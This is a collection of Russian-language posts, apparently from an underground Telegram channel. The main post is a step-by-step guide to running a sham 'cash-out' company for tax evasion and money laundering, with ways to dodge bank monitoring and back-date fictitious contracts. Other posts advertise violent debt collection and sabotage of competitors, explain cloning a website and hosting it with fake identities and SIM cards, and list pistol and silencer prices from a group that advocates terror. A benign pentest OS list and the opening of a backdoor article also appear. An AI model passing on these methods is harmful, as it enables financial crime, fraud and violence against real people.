HIDDEN COMMUNITY

Обнал. Как создать собственную обнал контору?

2020-06-19T21:17:37.184Z

Привет! Сегодня я вам расскажу об обнале!

Данная статья была написана не администрацией настоящего канала и не призывает к каким-либо противоправным действиям, а изложена исключительно в ознакомительных и развлекательных целях

В какой-то момент Вы возможно поймете, что обычной помойки оформленной не пойми на кого уже не хватает и возникает необходимость в создании белой (с легким серым налетом снижения НДС) и пушистой (транзитные операции) фирмы с очень хорошими оборотами и очень небольшими налогами и которая может прожить дольше чем стандартные 2-3 года. Обычно клиенты начинают работать с такими компаниями после того как они отлично отработали с стандартной помойкой, провалили камералку и выездную, и налоговики заботливо доначислили им НДС, прибыль и бонусом штрафы (все вместе 40-50%, мелочи то какие), а на суде как раньше стандартное «мы не знали что ООО «ЛАБЕАН» не платит налоги, мы не виноваты» уже не работает. Очевидно, что цена «работы» с такой компанией выше, но и шансов нарваться на вышеперечисленное меньше.

Наброски образа

Так как наша компания белая и пушистая, в ней будет работать некий штат сотрудников, стандартный набор из них: директор, глав.бух и менеджер.

У каждого из них будет вполне определенный набор функций, попробуем перечислить их.

Директор — лицо Компании, ставит подписи на договорах и товаросопроводительных документах, мотается по банкам сначала с целью открытия рс, затем с целью спасения их после хорошей работы по ним и предоставления документов по запросам, ну и на ковер конечно тоже идет он, первая подпись в банк клиенте.

Глав.бух - основная задачей оной личности является формирование отчетности, налоговое планирование, грамотные (sic!) ответы на запросы из налоговой и банков, в идеале, опять же, вторая подпись в банк клиенте ( ну и карточке образцов подписей соотв-но), «закрытие» сложных сделок в 1с.

Менеджер — девушка 20 +- лет, молодой специалист, некоторые навыки работы в 1с, основное занятие — контроль за движением документов, ответы на телефонные звонки контрагентов (алло, мы тут вам платить собираемся, на какой счет? - на данный вопрос должны знать ответ все сотрудники нашей компании), создание первичной документации (тн, выставление счетов по просьбам контрагентов), рассылка информационных писем (у нас тут счет в наебанке закрылся, не платите), курьерские функции.По мере увеличения объема документации число менеджеров увеличивается согласно необходимости.

Соответственно, дальше будет перечисление некоторых признаков компании, которые желательно соблюсти и которые не будут выдавать красные флажки при ближайшем рассмотрении и немного усложнят работу правоохранительным органам при проведении всяких нехороших мероприятий по доказыванию того, что ООО «ВЕКТОР» создано с целью сохранения денег другим людям.

Сама компания

1. Учредитель и директор — в идеале это разные люди, директор нанимается по трудовому договору. Естественно, без судимостей, дисквалификаций и прочей дряни.

2. Компания создана — первые 3-6 месяцев пусть не спеша раскачивается, не нужно гнать на нее сходу дикие обороты, ей нужно отлежаться перед тем как начать работать в полную силу.

3. Уставный капитал — величина в наших реалиях весьма эфемерная, а в нашем случае с одним учредителем показывающая среднюю температуру между моргом и крематорием. Стандартные 10000 внесенные столом и стулом смотрятся не очень, поэтому желательно увеличить. Как увеличивать — решайте и ищите пути сами, самый простой и дорогой это внесение денег в УК, есть способы увеличивать его почти без затрат, «из воздуха».

4. Юридический адрес — совпадает с реальным. Согласно последним рекомендациям ЦБ, банки должны пристально обращать внимание на разногласия между юридическим и фактическим адресом, может послужить одним из поводов для отказа в открытии р/с. По адресу — располагается офис, в котором стоит телефон, стандартный набор офисной мебели, рабочие места. Так же не поленитесь с клиентов собрать буклеты, рекламные проспекты, коммерческие предложения, создайте стенд с «образцами продукции». Некоторые банки любят отправлять менеджера на предмет проверки нахождения компании по адресу, в качестве одной из частей квеста «Открой счет в bank_name», приехав и увидев что-то похожее на работающий офис — лишних вопросов не будет.

5. «Специализированность» компании — безусловно, у компании в оквэдах может быть финансовое посредничество, стройка, проектирование, медицинское оборудование и запуск космических кораблей. Но это очень сильно бросается в глаза и кричит фин.мониторингу «Куси меня!». Гораздо лучше специализировать фирму на чем-то конкретном, например на продуктах. В таком случае, основной оквэд — оптовая торговля мясом, в допах — оптовая торговля консервами, мясопродуктами, прочая оптовая торговля и еще что-нибудь из этой же тематики.

Тоже самое действует для поступления и ухода денег на рс компании: приход денег за электротовары и уход за туризм, «консультации» и топливо — идея так себе, ведет сначала к запросу документов, потом к вышвыриванию из банка по 115 фз.

6. Внутренние документы — штатное расписание (не менее 10 позиций), ведение личной карточки сотрудников, что включает в себя весь стандартный кадровый набор (заявление о приемеувольнении, заявления на отпуска, копии паспорта, прописки, инн, в случае высшего-копия диплома, график отпусков, трудовой договор, договор о материальной ответственности и т. д.), правила внутреннего трудового распорядка.

Некоторые гласят о полезности создании положения о коммерческой тайне, обклеивании по кругу всего что похоже на доказуху лентами с надписью «Коммерческая тайна», но подтвердитьопровергнуть данную инфу не могу.

7. КДО, он же Критерий должной осмотрительности, еще одна весьма эфемерная величина, позволяющая налоговикам отказывать в вычете «входного» НДС на основании их домыслов о том, что контрагент выбран неосмотрительно (мы очень осмотрительно и выгодно купили у той помойки созданной месяц назад хз сколько станков и в целях личной прибыли перепродали их с смешной наценкой, да)

Если раньше можно было сказать, что компания проверила контрагента по сайту nalog.ru, увидела что компания действующая и на этом успокоилась, то сейчас реалии немного другие: с клиентами необходимо обмениваться набором копий уставных документов (устав, решение о назначении директора, приказ о вступлении в должность, ИНН, ОГРН), копиями договоров аренды офисасклада, свежая выписка из егрюл будет так же не лишней.

8. Сайт — он просто должен быть. Мультимедийный портал с радио, форумом и чатиком не нужен, достаточно обычной визитки с описанием компании, чем она занимается, где находится, реквизиты (инн, огрн, регистрация, юр адрес, адрес склада если есть), совсем неплохо будет прикрепить какой-нибудь прайс лист с перечнем товаров.

9. Зарплатный проект в банке и фонд оплаты труда. Белые части зарплаты — средние по отрасли в регионе, затраты на налоги снизить можно при помощи традиционных методов (отпуск за свой счет, неполный рабочий день и т. д.). Естественно работники должны знать сколько они получают согласно штатке и говорить именно это.

10. Документооборот. Можно написать талмуды по этому пункту, начиная от присваивания нумерации документам и заканчивая сроками обмена, но сие есть неблагодарное занятие, т. к. каждая команда устраивает документооборот по своему. Несколько советов:

не ленитесь раз в квартал проводить ревизию первички и договоров, на предмет отсутствующих, т. к. документы имеют свойство проебываться в прекрасное далеко. Старайтесь заводить первичку сразу после получения данных от клиента, а не откладывать это на потом.
ЧИТАЙТЕ ДОГОВОРА. Например, если в нем написано что согласование ассортимента, цены, сроков поставляемого товара идет через спецификации, значит они должны быть.
Старайтесь не использовать стандартный договор из конструктора договоров, погуглите, найдите что-то более развернутое и красивое, если сумма большая, то не стесняйтесь запросить сертификаты на товартехническое заданиеetc.
Самое главное: "Больше бумаги - чище жопа". В этой сфере бизнеса этот принцип работает как нигде.

11. НИКАКИХ ЛЕВЫХ ПЕЧАТЕЙ в офисе быть не должно. Да, я понимаю что порой приходится срочно изготавливать печать, затем с ней клепать документы за «контрагента» и т. д.

Старая шутка - «Каждая левая печать — плюс полгода к сроку». Храните это добро дома под подушкой, у тещи, но не в офисе.

Следующий раздел это советы по работе с нашим основным инструментом — банками и рс в них...

Предисловие

Реалии прошлого года таковы, что ЦБ начал иметь банки и в хвост и в гриву, создан реестр «неблагонадежных компаний» (при залете в него вероятность что к тебе придут с целью образовательной лекции о том сколько вы должны отдать государству сильно повышается, ну и как бонус-открыть рс в банке становится ОЧЕНЬ тяжело), новости о том что ЦБ в понедельник позавтракал двумя лицензиями банков уже никого не удивляют, и госпожа Наебуллина гордо носит медаль «За взятие Мастер банка» и еще пачку орденов.

Советы

1. Выбор банков для работы: расписывать можно очень много, все зависит от региона и наличия знакомых материальных договоренностей с конкретными представителями конкретного банка. Лучше, чтобы это были крупные банки из топ-100 (Сбер, Альфа, Юникредит, Газпромбанк и т. д.). Если договариваетесь с управляющим - помните, что СБ банка очень часто сидит вместе с фин.мониторингом в бэк офисе и повлиять на них он не может.

2. Количество рс: необходимо 2-3 расчетных счета, дабы в случае блокировки или, о ужас, закрытия одного из них, деньги перекидывались на другой рс, а не висели мертвым грузом.

Соответственно по мере закрытия одних счетов необходимо открывать другие. Помним, что это процесс уже занимает не один-два дня, так что как только осознаем, что запахло жареным — ищем новый банк.

3. И так, счета открыты, деньги приходят, заявки на отправку тоже есть.

Основные прописные истины здесь:

не зеркальте, вы сами сократите срок жизни данного рс ( пришло 5 мио 1 одним платежом и ушло 5 мио одним платежом, и так каждый день, 2-4 недели и RIP), старайтесь не отправлять ровные суммы ( 5 121 368 руб 25 коп для банка выглядит гораздо лучше чем просто 5 000 000 руб).
Не ленитесь выполнять одну отправку с 2 разных счетов, дробление не повредит.
До 1 мио разово спокойно платится по счету, больше и регулярно-только договор, только хардкор.
Если платите по выдуманным договорам, смотрите чтобы оно не попадало на праздникивыходныедату раньше регистрации компании которой платите.

4. Рекомендательные письма — будет не лишним попросить сделать парочку клиентов для вас подобные бумажки, банки любят это дело при открытии счетов.

5. Поддерживайте хорошие отношения с операционисткой, куратором вашей компании, управляющим отделения. Возможно эти люди когда-нибудь спасут вас от закрытия, проведут платеж после окончания операционного времени, успеют развернуть платеж... да много чего.

6. Старайтесь платить все хозяйственные платежи и налоги со всех счетов по очереди, т. к. иначе банк не увидев за полгода ни одного платежа за аренду и ни одной уплаты ндфл, к примеру, будет вести себя как очень ревнивая женщина и вы будете получать лишние запросы документов.

7. При открытии рс не поленитесь узнать форму доверенности банка для того, чтобы оформить ее на менеджера и она могла отвозить документыплатежкиetc.

8. Желательно банки держать на отдельном ноуте, который подключается исключительно к роутеру с настроенным white list из IP банков.

9. Не знаете что делать с остатком безнала на Новый Год? Депозит - ваш выбор! Заранее узнайте, что требуется для его размещения, чтобы не опоздать. Да и в глазах банка плюсиков наберете.

10. Ожидаете крупное поступление? Не поленитесь позвонить операционистке, предупредить и отвезти в банк, если есть конечно, все имеющиеся документы по данной сделке.

11. Запросы из банка, блокировка банк-клиента. Отвечать на них нужно быстро и по делу, везти все что просят, лишнего не везти. Если чего-то не хватает (отсутствие транспортных расходов, например) - пишите красивое письмо на бланке организации с объяснением (доставка осуществлялась силами покупателя и т. д.)

Постоянно проверяем входящую корреспонденцию в банк-клиенте!

Проебали. Не успели ответить на запрос? Скорее всего БК будет отключен, придется таскать до разблокировки платежки на бумаге, а банки обожают брать комиссию за отправку пп на бумаге (Альфа — 0.1% от суммы, например)

Так же следует помнить о том, что долго испытывать терпение банка — плохая идея, тк есть письмо ЦБ-60 Т, согласно которому в один не очень радостный для вас момент прилетает письмо об отключении банк клиента без объяснения причин и ссылкой на:

27.04.2007 № 60-Т

Об особенностях обслуживания кредитными организациями клиентов с использованием технологии дистанционного доступа к банковскому счету клиента (включая интернет-банкинг)

При заключении кредитными организациями договоров, предусматривающих обслуживание клиентов с использованием технологии дистанционного доступа к банковскому счету (включая интернет-банкинг), и создающих для уполномоченного лица (лиц) клиента возможность распоряжаться денежными средствами, находящимися на счете, используя аналог собственноручной подписи, коды, пароли и иные средства (далее - аналог собственноручной подписи), рекомендуется исходить из следующего.

Кредитным организациям рекомендуется включать в договоры право кредитной организации отказывать клиенту в приеме от него распоряжения на проведение операции по банковскому счету (вкладу), подписанному аналогом собственноручной подписи.

Кредитным организациям рекомендуется после предварительного предупреждения отказывать клиентам в приеме от них распоряжений на проведение операции по банковскому счету (вкладу), подписанных аналогом собственноручной подписи, в случае выявления сомнительных операций клиентов. При этом кредитным организациям рекомендуется принимать от таких клиентов только надлежащим образом оформленные расчетные документы на бумажном носителе.

Убираем конкурентов и должников

2020-06-18T10:21:47.636Z

Приветствую вас. Сегодня мы поговорим об уничтожении вашего конкурента/врага. А делать мы это будем, конечно же, не сами, а руками других людей и даже руками самого недоброжелателя. Как? Очень просто.. Сейчас всё расскажу и покажу.

Начнем с долгов

Представьте ситуацию, что вам задолжали более 1 млн рублей. Как бы вы не просили вернуть, как бы не давали второго шанса и не сдвигали срок долга человек никак его не отдает и, грубо говоря, забил на вас хер. На помощь вам придет профессионал своего дела. Человек, который занимается выбиванием денег с должников с 2016 года и который выбивал с людей деньги по 10.000.000р, в то время как заказчику они говорили, что у них еле-еле хватает денег на еду, а данному человеку они отдавали уже на следующий день.

Волшебство, не правда ли?

Вот условия, по которым работает данный человек:

1. Кого должник знает лично (думаю все догадываются какими методами я работаю, а ментам наверняка станет интересно кто же мог отправить людей поломать потерпевшего и оставить его в луже крови с запиской в кармане "Верни долг Васе до конца недели или зарежем");

2. Кто не знает ничего о цели (помочь собрать данные сможем, но если все данные сводятся к "Представился Петей, попросил дать 3 млн до завтра и исчез" - то вряд ли помогу);

3. Кто не готов внести предоплату за услуги (можно в гарант) минимум в 75% от полной (без учета указанной ниже премии) цены услуги (работать на условиях "Вон Игорь из соседнего дома должен мне 100500 млн, стрясете с него сами все и мне половину отдадите" не собираюсь и не буду);

4. Кто не готов оплатить мне премию минимум 25% от взысканного (25% это ставка при сумме от 5 млн руб, при меньших суммах ставка будет выше, впрочем никто часто не мешает отнести затраты на взыскание к штрафу должника);

5. У кого долг менее 1 млн рублей.

Небольшое дополнение от исполнителя:

Я не вдаюсь в подробности отношений заказчика и его должника, но практика показывает, что весьма часто отдельные участники высокодоходного (и такого же рискованного) рынка общеизвестных товаров имеют целые списки своих должников не имея возможности с них успешно взыскать долги после их кидка. Думаю все понимают о чем идет речь. Так вот, такие люди часто отлично подходят для взыскания силами моего сервиса.

Вот таких вот ребят можно найти, если сильно захотеть. Не занимайте деньги, если не сможете их отдать.

А что насчет конкурента?

С должниками разобрались, а что насчет прямых конкурентов? Действовать силой на таких ребят очень опасно, так как суммы там крутятся огромные и у вашего соперника охрана будет не хуже тех же спортиков, но оснащена будет гораздо лучше. Именно поэтому есть специальные ребята, которые сделают всё без лишних следов. И нет, это не киллер. Этот исполнитель сделает всё действительно без следов, руками обидчика.

Вот что пишет он о своих услугах:

"Я предоставляю услуги по уничтожению репутации и моральной дестабилизации. Попробую объяснить подробнее. Вот живет себе человек и внезапно в его жизни начинают происходить странные события. Одно хуже другого, срываются все сделки, все валится из рук. Жизнь превращается в череду неудач. Внезапно все от него отворачиваются. Он остается один.

Объект не понимает в чем дело, вроде никто к этому не причастен, все происходит само собой. Он в отчаянии. На этом этапе некоторые могут даже пойти в церковь. Но боженька не поможет. Наоборот, все станет только хуже. И вот тогда объект уже не может, и не хочет ничего делать. Он морально мертв. Вот такими вот моральными убийствами я и занимаюсь.

Работаю через гаранта. Стоимость, как вы понимаете, зависит от конкретного случая."

На подобное предложение ему поступил логичный вопрос:

Дестабилизация конкурентов тема перспективная, но интересно как ты собираешься подтвердить выполнение задачи? вот провел ты атаку жертвы, исполнил массу трюков, потратил время и возможно скорее всего бабос, а жертва радостно себе живет и радуется. Плату брать будешь за совершенные действия или за результат?

Ответ не заставил себя долго ждать:

Как и любая работа - эта имеет свое ТЗ. Иначе говоря, мы определяем - по каким признакам клиент поймет, что моя работа была исполнена. Говоря языком аллегорий. Если господин А хочет что бы господин Б сошел с ума, то госпитализация господина Б в клинику для душевнобольных будет весьма наглядным тому доказательством. Очень, кажется, наглядная аллегория. Для других случаем мы заранее обговариваем тот результат, который хотим получить. То есть если Господин А, хочет что бы господину Б стало как то жить не по кайфу, то мы заранее уточняем моменты по которым поймем, что господину Б ой как не по кайфу живется.

И далее был приведен конкретный пример:

Ко мне обратился человек с заказом на уничтожение конкурента, не физического в смысле, а как юридического лица. Это был общепит, который располагался непосредственно напротив аналогичного заведения моего клиента. В следующий месяц в заведении объекта внезапно завелись мыши, тараканы и даже муравьи. Откуда то появились неприятные запахи, от которых не помогало ничего. Клиенты стали регулярно проливать на мебель всяческие жидкости. Стали поступать многочисленные жалобы. А обслуживающий персонал стал позволять себе нецензурно браниться на посетителей. А уж драки там случались каждый день, и не просто драки, а с порчей мебели.

Вишенкой на торте стали бомжи, облюбовавшие это место для ежедневного перекуса булочкой и сладким чаем. Люди просто перестали туда ходить и заведение закрылось.

Данный материал несет ознакомительный характер и не является призывом к действию. За все совершенные противоправные действия вы несёте полную ответственность. Всегда думайте своей головой.

Как создать клон сайта?

2020-06-15T15:36:18.736Z

Здравствуйте, друзья! Сегодня будем учиться копировать сайт и ставить его на хост. Начнем!

Общая информация

На самом деле любой сайт — всего лишь код, который интерпретируется твоим браузером и приходит по запросу от хоста. Увы, но не каждый лендинг получится скопировать. Тем не менее, 70-80% из общего числа можно стянуть, что не может не радовать.

Есть 2 способа копирования:

Ручной. Копируем файлы и код.
Автоматизированный. Скрипты и программы.

Мы, само собой, остановимся на 2.

Установка и настройка софта для копирования

Работать будем с бесплатной программой Wget, которую можно скачать по ссылке: https://sourceforge.net/projects/tumagcc/files/

Переходишь на сайт и скачиваешь следующий архив (версия может отличаться):

BLACK SIDE

Далее создаешь папку по следующему пути: C:\Program Files\Wget

Извлекаешь из архива файлы в папку, созданную в предыдущем пункте. После в проводнике жмешь правой кнопкой мыши по «Этот компьютер» → «Свойства» → «Дополнительные параметры системы» → «Переменные среды»:

В «Системных переменных» → «Path»:

Там нажимаешь «Создать» и указываешь путь к папке с Wget:

Во всех окнах жмешь «ОК». Готово, установка выполнена.

Проверим, все ли сделано так, как необходимо. Для этого сочетанием клавиш win+R вызовем окошко «Выполнить», введем в него «cmd» (без кавычек), откроется командная строка. В ней пишем «wget» (так же, без кавычек), и, если видишь такое же сообщение, то инсталляция прошла успешно:

Непосредственное копирование сайта

Допустим, ты нашел сайт, копию которого хочешь получить. Сперва обрати внимание на адрес. Если там присутствуют символы из кириллицы (www.сауны.рф), то необходимо будет их конвертировать в корректный для работы Wget вид с помощью http://wwhois.ru/punycode.php:

Процесс копирования продемонстрирую на примере http://kinder-big.ru

Заходим в командную строку и прописываем: wget --page-requisites -r -l 10 адрес_копируемого_сайта

В данном конкретном случае команда будет выглядеть так:

Жмем «Enter», и запускается процесс копирования. После его завершения будет выведено соответствующее сообщение:

Исходники сайта хранятся в папке по пути: C:\Users\имя_пользователя\kinder-big.ru

Регистрация на хостинге и залив сайта

То, с каким хостингом работать — личное дело каждого, но все дальнейшие разъяснения я буду вести на примере https://beget.com/ . В целом, особых отличий нет, так что можешь выбрать любой другой более-менее адекватный.

Все действия производятся на подготовленной в предыдущей части системе.

Сперва необходимо пройти регистрацию, для этого нажимаешь в правом верхнем углу кнопку «Заказать», выбираешь самый дешевый тариф и заполняешь форму. Указывать данные, разумеется, нужно «левые» (комплекты документов продаются на все тех же теневых площадках). Номер вводишь от «левой» СИМ-карты (советую заранее запастись десятком таких), на него придет СМС с кодом подтверждения регистрации.

После этого, введешь код из сообщения, тебя перекинет на страницу, где указаны данные для авторизации. Письмо с ними же придет на почту.

Нажимаем кнопку «Начать работу» и попадаем в панель управления нашим хостингом.

Следующим шагом будет регистрация домена (ссылки на сайт, простым языком). Для этого пополняем баланс хостинга через «левый» Qiwi-кошелек:

В «Период оплаты:» ставим «Произвольная сумма» и вводим в поле ниже 180, нажимаем «Оплатить». На открывшейся странице жмем на Qiwi:

Вписываем данные от «левого» (обожаю это слово) кошелька и оплачиваем покупку.

Теперь, когда деньги поступили на баланс, жмешь «Домены и поддомены»:

Переходишь на вкладку «Зарегистрировать домен», там нужно будет ввести доменное имя. Проверить, занят тот или иной адрес, можно с помощью сервиса http://www.whois-service.ru :

Доменную зону следует выбирать соответственно целевой аудитории. То есть, если для буржуев, то «.com», если для РФ, то «.ru».

После того, как выберешь доменное имя, появится обязательная для заполнения форма:

Заполняем ее на купленные «левые» документы.

После нажимаем «Продолжить» и отключаем «Продлевать автоматически»:

Жмем кнопку «Зарегистрировать» и дожидаемся подтверждения (обычно это занимает нескольких часов).

Следующим шагом будет перенос файлов на хостинг и здесь есть 2 пути:

1) Через встроенный файловый менеджер хостинга.

Для этого идем в папку со скопированным сайтом, находящуюся по пути C:\Users\имя_пользователя\kinder-big.ru, выделяем все файлы, щелкаем по ним правой кнопкой мыши и при помощи winrar (или иных архиваторов) формируем zip-архив.

Далее следуем на хостинг в пункт «Файловый менеджер», справа будет папка с именем зарегистрированного ранее домена, переходишь в нее:

После открываешь папку «public_html». В ней будет индексный файл «index», удаляй его (папку «sgi-bin» не трогай).

В верхней панельки ждешь на «Загрузить Файлы»:

В открывшемся окне в верхнем левом углу выбираешь «Browse» и отмечаешь сформированный ранее zip-архив. Нажимаешь «Загрузка» и ждешь, пока файлы прогрузятся на хост:

Щелкаешь правой кнопкой мыши по загруженному архиву и выбираешь «Распаковать архив»→ «ОК». Теперь архив можно удалить: Правой кнопкой мыши → «Удалить». По итогу структура файлов будет выглядеть подобным образом:

Сайт успешно залит на хостинг и при попытке перейти на него по доменному имени, ты увидишь результат.

2) Загрузка через FTP клиент (предпочтительно).

Первым делом нужно скачать сам клиент FileZilla https://www.filezilla.ru/get/ . Сложностей со скачиванием быть не должно, просто выбираешь самую свежую версию под свою ОС.

Дальше стандартная процедура установки, можешь не вникать в подробности и просто жать «ОК».

Далее нужно будет подключиться к хосту.

В поле «Хост:» вводишь адрес сервера из технической информации:

В «Имя пользователя:» и «Пароль:» - данные, которые приходили на почту при регистрации:

После жмешь на «Быстрое соединение», клиент выполнит подключение и ты получишь возможность загружать файлы без предварительной упаковки в архив.

Для этого в левой части окна переходишь в папку с исходниками, а в левой — в папку с именем зарегистрированного домена. Перемещаешь все исходники из левой части в правую, ждешь, пока выполнится загрузка и можешь проверять результат:

Все готово, теперь реализуй свои знания на практике и зарабатывай бабки, спасибо за прочтение!

ДИСКЛЕЙМЕР

Данная статья представлена исключительно в ознакомительных целях и не несет призыва к действию. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий.

Слив курса по заработку в Телеграме

2020-06-12T08:47:20.199Z

Привет! Курс обошелся в 6500 рублей и я сливаю его вам. Все крайне просто, если не лениться то можно хорошо озолотится.

Цвет: белый или серый (учат обоим видам заработка)

Доходность: от 150.000 рублей в месяц (позже вы поймете почему)

Длительность обучения: 10 дней

Вложения: до 2.500 рублей

Навыки: от вас только до 2 часов каждый день на момент обучения, ничего особенного знать не надо

Почему такая доходность?

Да потому, что мы будем работать в доходной нише Telegram'a. Многие из вас знают, что в Telegram аудитория очень платежеспособная. И нет, это ни создание канала, ни накрутка подписчиков, ни продажа рекламы. Это вообще то, о чем вы даже не могли догадаться.

Если бы вы делали эту тему сами, то вам бы пришлось потратить от 30.000 рублей, но курс избавляет вас от этих огромных затрат за более адекватную сумму.

Скачать можно тут (pdf - файл)

Пароль от архива: infosklad.org

Русское подполье

2020-06-11T11:53:35.662Z

Приветствую вас, будущих Магнатов. Копаясь по просторам Tor'a нашел интересное объединение людей, которые называют себя "Русское Подполье". Я не мог не рассказать вам об этом, так как это действительно занимательно.

О чём речь?

"Русское Подполье" - объединение русских националистов, главной целью которых является трансформация нынешней России в Русское национальное государство (РНГ).

Вот что они пишут о себе на главной странице:

"Мы позиционируем себя как нелегальное крыло Русского Движения.

Наша текущая цель — трансформация нынешней эРэФии в Русское национальное государство (РНГ).

Способ такой трансформации мы видим через подпольную деятельность вооружённых ячеек, через точечный террор конкретных персон (а не всех подряд или кого попало)."

На своём форуме они делятся тематической литературой, презирают и обсуждают людей иной расы, общаются, делятся различной информацией. У них так же присутствует своя иерархия, о которой подробно написано на их форуме

Продажа оружия

Да, да. Эти ребята продают оружие для "своих" ребят. Сами знаете для каких целей. Вот пара товаров:

Цены на оружие довольно-таки демократичные, так как их делают для общего дела".

Классический ПМ - 48 000.

ПМ с резьбой под глушитель - 50 000.

Стволик без резьбы - 14 000.

Стволик с резьбой 13х1 (левая,правая) - 16 000.

Глушитель - 25 000.

ПМ с глушителем - 73 000.

Правилами форума запрещены:

Любая русофобская риторика
Дегенеративный сленг и намеренное пренебрежение правилами русского языка
Оскорбления, троллинг, спам, реклама, посты из смайлов, лозунгов, попрошайничество
Пустые обещания, угрозы, 'приговоры', ничем не подкрепленные манифесты
Коммерция вне Торгового раздела
Сообщения о кооперации вне ЛС: назначение встреч, действий, поиски соратников
Публикация личных данных пользователей или переписки без разрешения модераторов

Вот такие вот ребята обитают на просторах Tor'а. Не советую присоединяться к подобным объединениям, так как они создают для вас определенные рамки, а они нам не нужны

Данный материал несет ознакомительный характер и не является призывом к действию. За все совершенные противоправные действия вы несёте полную ответственность. Всегда думайте своей головой.

Топ 10 ОС по анонимности и пентесту

2020-06-10T13:11:05.429Z

Привет всем!

В данной теме я хочу рассказать про топ 10 ОС, которые на мой взгляд пригодны для анонимности и пентеста.

Ну что же, приступим!

1. Kali Linux

Kali Linux – самый нашумевший дистрибутив Linux, используемый для этичного хакинга и пентеста. Offensive Security разрабатывали Kali Linux как наследника BackTrack.

Kali Linux базируется на Debian. Он снабжён многочисленными средствами для пентеста из разнообразных сфер криминалистики и безопасности.

Это наиболее продвинутая площадка пентеста. Подходит для кучи девайсов и платформ оборудования. В дополнение Kali Linux порадует вас подробной документацией и огромным активным сообществом.

2. BackBox

BackBox сделали на базе Ubuntu и спроектировали для пентеста и анализа конфиденциальности и целостности. Входит в топ систем для хакинга.

У BackBox есть репозиторий, где вы найдёте свежайшие и надёжные версии всевозможных инструментальных коллекций для системного или сетевого анализа и общепризнанные средства для этичного хакинга. Этот минималистический софт предлагается со свободной рабочей средой XFCE. Таким образом, гарантирует скорость, эффективность, настраиваемость и полную оснастку. За ним также стоит отзывчивое сообщество.

3. Parrot Security OS

Parrot Security OS – новенький в команде. Frozenbox Network разрабатывает эту систему. Делали Parrot Security OS для пентестеров, которым важна поддержка облачности, сетевая анонимность и системное шифрование.

База Parrot Security OS – также Debian, а рабочая среда – MATE. Здесь увидите чуть ли не все общепризнанные инструментальные средства пентеста, наряду с эксклюзивными программными разработками Frozenbox Network.

4. BlackArch

Назначение BlackArch – пентест и анализ безопасности. Разработанный на базе Arch Linux.

У платформы личный репозиторий, который содержит тысячи сгруппированных инструментов. Их количество растёт с течением времени.

5. DEFT Linux

DEFT, сокращённо от Digital Evidence & Forensics Toolkit, Linux разрабатывали для компьютерно-технической экспертизы. Помогает запустить действующую систему с проверкой подключённых устройств на повреждение или фальсификацию во время загрузки.

DEFT спаренный с DART, платформой для компьютерно-технической экспертизы Windows. В нём увидите среду рабочего стола LXDE и WINE для загрузки средств Windows.

6. Bugtraq

Bugtraq похвастается громадной инструментальной коллекцией для хакинга, криминалистики и проведения исследований.

Для Bugtraq вы выбираете рабочие среды: GNOME, XFCE или KDE. Основа у него тоже разная: кому-то Debian, а другому Ubuntu либо OpenSUSE. Из 11 языков, на которых он представлен, найдётся подходящий вам.

Bugtraq поражает невероятным количеством пентестерских инструментов – мобильная компьютерно-техническая экспертиза, лаборатории для исследования на вредоносные программы, плюс уникальные средства, которые разрабатывает сообщество Bugtraq.

7. Samurai Web Testing Framework

Этот инструмент разрабатывали для одной задачи – пентеста в сети. Он отличается от других ещё и тем, что представляет собой виртуальную машину при поддержке VMWare и работе с Virtualbox.

Программный продукт базируется на Ubuntu. Он вооружит вас первоклассными и бесплатными средствами с открытыми исходниками и ориентацией на тестинг и хакинг веб-сайтов.

А бонусом будет преднастроенная Wiki для сохранения данных проводимых пентестов.

8. Pentoo Linux

Pentoo основывается на Gentoo Linux. Эта платформа прекрасна для пентеста и security-тестинга. Поставляется как LiveCD с хранением данных, а значит, внесённые изменения остаются доступными при очередном запуске, если воспользоваться накопителем с интерфейсом USB.

Pentoo – в сущности Gentoo плюс масса конфигурируемых средств, функциональных особенностей ядра и прочего. Применяется свободная XFCE.

9. Network Security Toolkit

Network Security Toolkit основывается на Fedora. С ним информационные безопасники и сетевые администраторы получают массу инструментов по ИБ. Исходники этих средств открыты. Загружается со сменного носителя.

Платформа славится высокоразвитым веб-интерфейсом. С ней удобно администрировать системы либо сети, автоматизировать, управлять, исследовать и мониторить сети, конфигурировать программы из этого дистрибутива.

10. Caine

CAINE расшифровывается как Computer Aided Investigative Environment – среда исследований с автоматизацией. Создавалась в качестве системы компьютерной криминалистики и целиком заточена под это.

Caine устанавливается с огромным разнообразием средств исследования системы и компьютерно-технической экспертизы.

Ну вот как бы мой топ, опять же это мое личное мнение, поэтому не судите строго!

Спасибо всем за внимание!

Скрытое управление компьютером на Windows

2020-06-09T09:40:47.577Z

Сегодня мы рассмотрим вопрос скрытого управление компьютером на Windows.

Данная статья была написана не администрацией настоящего канала и не призывает к каким-либо противоправным действиям, а изложена исключительно в ознакомительных и развлекательных целях. А также в целях защиты читателей от мошенничества и других противоправных действий. Выполнение данных действий может преследоваться законом.

Введение

Указанная задача может быть решена различными способами. В том числе с применением легитимных программ – к примеру, VNC серверами, TeamViewer (если добавить в автозапуск и скрыть отображение иконки в трее), а также специализированного ПО, в том числе коммерческого. Здесь будет показано, как контролировать чужой компьютер используя Metasploit.

Статья не охватывает проблему доставки полезной нагрузки, инфицирования компьютера жертвы и вопросы предотвращения обнаружения, в том числе антивирусами. Главная цель этого материала – взглянуть на бэкдор глазами хакера для понимания принципов работы и значения угроз. Будет показано, как получить полный доступ над файловой системой, загружать или запускать любой файл, менять разнообразные системные настройки и даже выходить за пределы компьютера: делать снимки веб-камерой, делать видео- и аудио- захват с веб-камеры.

На протяжении все статьи будет постоянно употребляться термин «полезная нагрузка» (payload) и некоторые другие. Поэтому начнём с определения этих понятий.

Что такое полезная нагрузка (payload)

В статьях и учебниках по компьютерной безопасности можно часто встретить слово payload. Буквально оно переводится как «полезная нагрузка». Под этим словом подразумевают код или часть вредоносной программы (червей, вирусов), который непосредственно выполняет деструктивное действие: удаляет данные, отправляет спам, шифрует данные, открывает подключение для хакера и т.д. Вредоносные программы также имеют overhead code (буквально «служебный код»), под которым понимается та часть кода, которая отвечает за доставку на атакуемую машину, самостоятельное распространения вредоносной программы или препятствует обнаружению.

Т.е. «полезная нагрузка» для пользователя («жертвы») является совсем не полезной.

